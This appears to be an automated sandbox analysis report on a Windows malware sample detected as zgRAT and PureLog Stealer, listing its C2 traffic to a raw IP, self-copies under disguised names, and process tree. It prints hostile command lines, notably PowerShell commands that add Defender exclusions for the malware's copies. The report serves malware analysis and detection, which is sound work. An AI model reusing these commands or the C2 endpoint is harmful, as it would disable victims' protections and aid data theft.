                                          Sep 13, 2024 21:04:38.649760962 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:39.004472017 CEST2532OUTData Raw: 5b 5f 43 57 55 4a 5c 52 59 5f 51 51 52 5d 54 55 5a 59 5a 5c 55 52 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_CWUJ\RY_QQR]TUZYZ\URSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9?/5#> 9])(*U?Z+8?'32: 1??';9[&!^-3
                                          Sep 13, 2024 21:04:39.399868011 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:39.532947063 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          136192.168.2.45680631.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:39.661396980 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:40.020231009 CEST2532OUTData Raw: 5e 56 46 55 55 42 5c 51 59 5f 51 51 52 51 54 57 5a 5a 5a 5c 55 55 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFUUB\QY_QQRQTWZZZ\UUSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<<672:##=((&??)[>+<('3,1*($?<X&9[&!^-
                                          Sep 13, 2024 21:04:40.412785053 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:40.565746069 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          137192.168.2.45680731.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:40.695302963 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:41.051325083 CEST2532OUTData Raw: 5b 54 43 57 50 43 5c 51 59 5f 51 51 52 5e 54 57 5a 59 5a 5d 55 57 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TCWPC\QY_QQR^TWZYZ]UWSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A?\ 2 #6=(:R<<%[=^(T)/:'%: 2<7%9[&!^-
                                          Sep 13, 2024 21:04:41.437607050 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:41.567092896 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          138192.168.2.45680831.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:41.691427946 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:42.039100885 CEST2532OUTData Raw: 5e 56 46 54 50 46 59 57 59 5f 51 51 52 5f 54 5b 5a 53 5a 50 55 50 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFTPFYWY_QQR_T[ZSZPUPSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(/!!2"##=+)()(0+?63/&,$<8_&9[&!^-;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          139192.168.2.45680931.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:42.276323080 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2080
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:43.056803942 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:43.423708916 CEST25INHTTP/1.1 100 Continue


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          140192.168.2.45681031.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:42.403116941 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:43.148972988 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:43.423782110 CEST25INHTTP/1.1 100 Continue


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:15:02:01
                                          Start date:13/09/2024
                                          Path:C:\Users\user\Desktop\84JufgBTrA.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\84JufgBTrA.exe"
                                          Imagebase:0xdd0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1841806382.0000000013369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:15:02:06
                                          Start date:13/09/2024
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"
                                          Imagebase:0x7ff771ec0000
                                          File size:2'759'232 bytes
                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:15:02:06
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:15:02:06
                                          Start date:13/09/2024
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP"
                                          Imagebase:0x7ff7390f0000
                                          File size:52'744 bytes
                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:16
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Imagebase:0xa70000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 68%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:19
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x70000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 68%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:21
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Recovery\RuntimeBroker.exe
                                          Imagebase:0xca0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 68%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:22
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:23
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:24
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:25
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:26
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:27
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:28
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:29
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:30
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:31
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:32
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Recovery\RuntimeBroker.exe
                                          Imagebase:0x3e0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:33
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat"
                                          Imagebase:0x7ff772820000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:34
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:35
                                          Start time:15:02:09
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\chcp.com
                                          Wow64 process (32bit):false
                                          Commandline:chcp 65001
                                          Imagebase:0x7ff627790000
                                          File size:14'848 bytes
                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:36
                                          Start time:15:02:09
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\w32tm.exe
                                          Wow64 process (32bit):false
                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                          Imagebase:0x7ff6bae80000
                                          File size:108'032 bytes
                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:37
                                          Start time:15:02:14
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff693ab0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:38
                                          Start time:15:02:16
                                          Start date:13/09/2024
                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x7e0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:41
                                          Start time:15:02:19
                                          Start date:13/09/2024
                                          Path:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x690000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:44
                                          Start time:15:02:24
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:45
                                          Start time:15:02:29
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Recovery\RuntimeBroker.exe"
                                          Imagebase:0x3f0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:46
                                          Start time:15:02:43
                                          Start date:13/09/2024
                                          Path:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x870000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:48
                                          Start time:15:02:54
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Recovery\RuntimeBroker.exe"
                                          Imagebase:0xe10000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:49
                                          Start time:15:03:03
                                          Start date:13/09/2024
                                          Path:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x960000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:50
                                          Start time:15:03:11
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Recovery\RuntimeBroker.exe"
                                          Imagebase:0xf60000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:52
                                          Start time:15:03:20
                                          Start date:13/09/2024
                                          Path:C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0xe20000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:53
                                          Start time:15:03:28
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Recovery\RuntimeBroker.exe"
                                          Imagebase:0x1b0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:3.9%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:12
                                            Total number of Limit Nodes:0
                                            execution_graph 22320 7ffd9ba2b8d0 22321 7ffd9ba2b8d6 ResumeThread 22320->22321 22323 7ffd9ba2b9e4 22321->22323 22328 7ffd9ba2a11d 22329 7ffd9ba2a12b SuspendThread 22328->22329 22331 7ffd9ba2a204 22329->22331 22316 7ffd9ba2d675 22317 7ffd9ba2d68f GetFileAttributesW 22316->22317 22319 7ffd9ba2d755 22317->22319 22324 7ffd9ba2ba39 22325 7ffd9ba2ba47 CloseHandle 22324->22325 22327 7ffd9ba2bb24 22325->22327

                                            Executed Functions

